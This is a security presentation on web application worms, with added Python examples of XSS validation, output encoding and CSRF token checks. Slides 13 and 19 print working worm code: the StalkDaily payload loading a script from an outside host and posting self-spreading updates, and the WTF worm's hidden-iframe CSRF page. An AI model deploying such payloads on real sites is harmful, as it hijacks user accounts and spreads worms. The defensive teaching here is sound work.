Web application worms
Web application vulnerabilities are dangerous. Hackers can target the web application directly (e.g. via SQL Injection) or can target the web application users (e.g. via XSS). In recent years a new type of attack was developed in which an infected innocent user infects other users (AKA web application worms). Such attacks usually have exponential growth and cause massive damage. In this presentation we will discuss how to develop a web application worm and, most importantly, how to protect your website from web application worms.

    1. Web Application Worms
       By: Mostafa Siraj (@mostafasiraj)

    2. Agenda
       • Computer Worms
       • Why Hackers Develop Web Application Worms
       • Web Application Worms
       • Introduction to XSS
       • StalkDaily Worm on Twitter - XSS Worm
       • Introduction to CSRF
       • WTF Worm on Twitter - CSRF Worm
       • Potential Business Impact
       • XSS & CSRF Defenses for: Users, Web Developers, Security Professionals
       • Questions

    3. DISCLAIMER
       • Hacking websites is ILLEGAL
       • This presentation is meant for educational purposes ONLY
       • Only use this stuff on YOUR website and YOUR account

    4. Computer Worm
       A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. (1) According to Wikipedia

    5. Why Hackers Develop Web Application Worms
       • Easier to develop
       • Cross platform (Windows, Linux, OSX and Android) since execution occurs in the web browser
       • Don't rely on browser, application or OS vulnerabilities
       • Can propagate faster and cleaner than even the most notorious worms
       • 1.01 billion active users on FB (2) according to Yahoo Finance
       • 170 million active users on Twitter (3) according to TechCrunch

    6. Percentage likelihood that at least one serious vulnerability will appear in a website
       (Chart.) (4) According to the WhiteHat Security Website Statistics Report, Summer 2012

    7. Web Application Worms
       An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagates among visitors of a website in an attempt to progressively infect other visitors. (5) According to Wikipedia, with modification.
       You'll see how to create a worm using a CSRF vulnerability only, without XSS.

    8. How XSS Starts
       (Screenshot: Adidas website.)

    9. Cross Site Scripting (Reflected)
       (Diagram. Labels: Vulnerable Site, Hacker Site, Cookie; the injected link is example.com?q=<script>…….)

    10. Cross Site Scripting (Stored XSS)
       (Diagram. Labels: Vulnerable Site, Hacker Site, Cookie.)

    11. XSS Worms: StalkDaily Worm on Twitter

    12. StalkDaily Worm
       The bio field allowed JavaScript:
           <script src="hxxp://mikeyylolz.uuuq.com/x.js" />
    13. StalkDaily Script
       (6) Source: dcortesi.com. Excerpt as shown on the slide (the authtoken variable and the XHConn helper are defined elsewhere in the worm):

           update = urlencode("Hey everyone, join www.StalkDaily.com. Its a site like Twitter but with pictures, videos, and so much more! :)");
           xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
           var ajaxConn = new XHConn();
           ajaxConn.connect("/status/update", "POST", "authenticity_token=" + authtoken + "&status=" + update + "&tab=home&update=update");
           ajaxConn1.connect("/account/settings", "POST", "authenticity_token=" + authtoken + "&user[url]=" + xss + "&tab=home&update=update");
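The StalkDaily script above works because the user[url] profile field accepted a value containing quotes and angle brackets and the settings page then echoed it unencoded into an anchor tag. The following added example (not part of the presentation or of the worm's source) shows the two XSS defenses from the developer slide applied to exactly that field: "accept only known good" input validation that rejects anything that is not a plain http(s) URL, and context-aware output encoding when the stored value is rendered. WORM_URL_FIELD is a constructed sample modelled on the payload on the slide (script host defanged as hxxp), and MAX_URL_LEN is an assumed limit.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed samples. WORM_URL_FIELD is modelled on the value the StalkDaily
# payload wrote into the profile URL field (script host defanged as hxxp);
# BENIGN_URL_FIELD is what a normal user would enter.
WORM_URL_FIELD = ('http://www.stalkdaily.com"></a>'
                  '<script src="hxxp://mikeyylolz.uuuq.com/x.js"></script><a ')
BENIGN_URL_FIELD = "https://example.com/~alice/blog?ref=twitter"

MAX_URL_LEN = 200  # assumed field limit
# Characters legal in a URL (RFC 3986 unreserved + reserved + '%').
URL_CHARS = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    "-._~:/?#[]@!$&'()*+,;=%"
)


def validate_profile_url(value: str) -> Optional[str]:
    """'Accept only known good' validation for a URL field.

    Returns the value unchanged if it is an absolute http(s) URL made only of
    URL characters, otherwise None. Quotes, angle brackets and spaces are not
    URL characters, so the worm payload is rejected before it is ever stored.
    A javascript: URL is rejected by the scheme check.
    """
    if not value or len(value) > MAX_URL_LEN:
        return None
    if any(ch not in URL_CHARS for ch in value):
        return None
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return value


def render_profile_link(url: str, display_text: str) -> str:
    """Output encoding chosen per HTML context.

    The URL lands inside a quoted attribute value, so it is attribute-escaped
    (quote=True turns " into &quot;); the display text lands in element
    content, so it is HTML-escaped. Even if a hostile value reaches this point
    it cannot close the attribute or open a <script> element.
    """
    return '<a href="{}">{}</a>'.format(
        html.escape(url, quote=True), html.escape(display_text)
    )


def safe_profile_link(stored_value: str, display_text: str) -> str:
    """Defense in depth: validate on input, encode on output.

    A value that fails validation is rendered as plain escaped text with no
    link at all, so a bad value that slipped into storage still does nothing.
    """
    url = validate_profile_url(stored_value)
    if url is None:
        return html.escape(display_text)
    return render_profile_link(url, display_text)


if __name__ == "__main__":
    for value in (BENIGN_URL_FIELD, WORM_URL_FIELD, "javascript:alert(1)"):
        print(repr(value[:40]), "->", safe_profile_link(value, "my site"))
```

Validation rejects the worm value outright, and even if render_profile_link is called on it directly the output contains only the two attribute-delimiting quotes and no `<script` text, which is the property the "Output Encoding (ESAPI)" bullet is after. Note that the blacklist approach the slide warns against (stripping `<script>`) would not have helped here, because the payload's first job is to close the `href` attribute with a quote.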
    14. StalkDaily Infected Users
       (Chart.)

    15. What About CSRF Worms

    16. CSRF Example
       User has to be logged in.
           https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999
       (Diagram. Labels: MyBank.com, "Click Here to Win".)

    17. CSRF Worms: WTF Worm on Twitter

    18. WTF Worm
       Updating status on Twitter wasn't protected from CSRF. By visiting the hacker site, your Twitter account will automatically write two tweets.
    19. WTF Worm Script
       (7) Script source: christianheilmann.com

           <html>
             <head></head>
             <body>
               <script>
                 var el1 = document.createElement("iframe");
                 var el2 = document.createElement("iframe");
                 el1.style.visibility = "hidden";
                 el2.style.visibility = "hidden";
                 el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
                 el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
                 document.getElementsByTagName("body")[0].appendChild(el1);
                 document.getElementsByTagName("body")[0].appendChild(el2);
               </script>
             </body>
           </html>
    20. Discussion about WTF worm on Twitter
       (Screenshot.)

    21. XSS and CSRF on Facebook
       (Screenshots; searches were done on Google.)

    22. Potential Business Impact of Web Application Worms
       • The snowball effect (Samy versus Code Red)
       • Web browser botnets (DDoS)
       • Think about a worm targeting eBay or Amazon (purchases, reviews, ...etc)
       • Stealing users' credentials (MySpace worm in 2006) (10) According to computerworld.com
       • What could happen if AdSense or Facebook Connect was compromised with a web application worm
       • "High Roller" malware targeting cloud based banking (estimated losses 75M-2.5B) (11) According to redmondmag.com

    23. XSS & CSRF Defenses

    24. Defenses for Users
       • Exercise caution when clicking on links sent by email, instant message or through social networks
       • Use ScriptNo on Chrome and NoScript on Firefox (use IE at your own risk)
       • Avoid questionable websites and cracked software
       • Be alert to security incidents
    25. Defenses for Web Developers
       XSS
       – Input Validation (accept only known good)
       – Output Encoding (ESAPI)
       – Set the session cookie to be "HTTPOnly"
       – Specify the output encoding (UTF-8, ASCII, ...etc)
       – Do not use "blacklist" validation
       – Don't encode/decode more than once
       – (8) XSS Prevention Cheat Sheet on OWASP
       CSRF
       – Use CSRFGuard from OWASP
       – Do not use the GET method for any request that triggers a state change.
       – Identify especially dangerous operations and send a separate confirmation request to ensure that the user intended to perform that operation.
       – Ensure that there are no XSS vulnerabilities in your application
       – (9) CSRF Prevention Cheat Sheet on OWASP
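The CSRF rules on this slide are easiest to see against the two attacks shown earlier: the MyBank "Transfer" link (slide 16) and the WTF worm's hidden iframes (slide 19), both of which are plain GET requests carrying the victim's cookie. The added example below (not part of the presentation, and not OWASP CSRFGuard itself) is a minimal request gate that refuses state changes over GET, requires a session-bound HMAC token on POST, and issues the session cookie with HttpOnly and Secure set. The endpoint paths come from the slides; the session id and SERVER_SECRET are constructed values, and csrf_token_for is an assumed token scheme, not Twitter's or any bank's.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Constructed: a per-deployment secret that never leaves the server.
SERVER_SECRET = secrets.token_bytes(32)

# Endpoints from the slides that change server-side state. Only a POST
# carrying a valid token may reach them.
STATE_CHANGING_PATHS = frozenset(
    {"/Transfer", "/status/update", "/account/settings", "/share/update"}
)


def issue_session_cookie(session_id: str) -> str:
    """Build the Set-Cookie header value for the session cookie.

    HttpOnly keeps the cookie out of reach of document.cookie, so an XSS
    payload cannot read it; Secure keeps it off plaintext connections.
    """
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip()


def csrf_token_for(session_id: str) -> str:
    """Derive the anti-CSRF token from the session with a keyed hash.

    The site embeds this value in its own forms. A page on another origin
    (the hacker site in the WTF worm, the "Click Here to Win" page in the
    bank example) can make the browser send the cookie, but cannot read
    the token, so its forged request arrives without it.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_request(method: str, url: str, cookies: Dict[str, str],
                   form: Optional[Dict[str, str]] = None) -> Tuple[int, str]:
    """Minimal request gate applying the CSRF rules from the slide.

    Returns an (HTTP status, message) pair.
    """
    form = form or {}
    path = urlsplit(url).path
    session_id = cookies.get("session")
    if session_id is None:
        return 401, "login required"
    if path in STATE_CHANGING_PATHS:
        # Rule: never change state on GET. The WTF worm's hidden iframes and
        # the bank "Transfer" link are both plain GETs and stop here.
        if method != "POST":
            return 405, "state change via %s rejected" % method
        # Rule: a POST must carry the token only the site's own pages know.
        # compare_digest avoids leaking the token through timing differences.
        token = form.get("csrf_token", "")
        if not hmac.compare_digest(token.encode(), csrf_token_for(session_id).encode()):
            return 403, "missing or invalid CSRF token"
    return 200, "ok: " + path


if __name__ == "__main__":
    cookies = {"session": "sess-1234"}  # constructed session id
    print(issue_session_cookie("sess-1234"))
    # The WTF worm's hidden iframe (slide 19):
    print(handle_request("GET", "http://twitter.com/share/update?status=WTF:%20", cookies))
    # The MyBank link (slide 16):
    print(handle_request("GET", "https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999", cookies))
    # A forged cross-site POST, which cannot include the token:
    print(handle_request("POST", "https://www.MyBank.com/Transfer", cookies, {"to": "hacker"}))
    # The site's own form, token included:
    print(handle_request("POST", "https://www.MyBank.com/Transfer", cookies,
                         {"to": "bob", "csrf_token": csrf_token_for("sess-1234")}))
```

The last bullet on the slide ("ensure that there are no XSS vulnerabilities") is not optional here: the StalkDaily script on slide 13 ran inside Twitter's own origin and simply read authenticity_token from the page before posting, so a token check alone passes the worm's requests. The token stops cross-origin forgery; stopping same-origin script is the job of the XSS defenses above it.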
    26. Security Professionals
       • Remember "The natural way of writing code is insecure"
       • Developers must take application security training
       • Secure the whole SDLC
       • Assessments and Penetration Tests
       • White box and black box testing
       • Start considering WAF

    27. Questions

    28. References
       (1) Computer Worm on Wikipedia. http://en.wikipedia.org/wiki/Computer_worm
       (2) Active Users on Facebook. http://finance.yahoo.com/news/number-active-users-facebook-over-years-214600186--finance.html
       (3) Active Users on Twitter. http://techcrunch.com/2012/07/31/twitter-may-have-500m-users-but-only-170m-are-active-75-on-twitters-own-clients/
       (4) WhiteHat Security Website Statistics Report. https://www.whitehatsec.com/assets/WPstats_summer12_12th.pdf
       (5) XSS Worms on Wikipedia. http://en.wikipedia.org/wiki/XSS_worm
       (6) StalkDaily script. http://www.dcortesi.com/blog/2009/04/11/twitter-stalkdaily-worm-postmortem/
       (7) WTF script. http://christianheilmann.com
       (8) XSS Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
       (9) CSRF Prevention Cheat Sheet. https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
       (10) MySpace worm. http://www.computerworld.com/s/article/9005607/MySpace_worm_uses_QuickTime_for_exploit
       (11) High Roller malware. http://redmondmag.com/articles/2012/06/20/malware-targeting-banking.aspx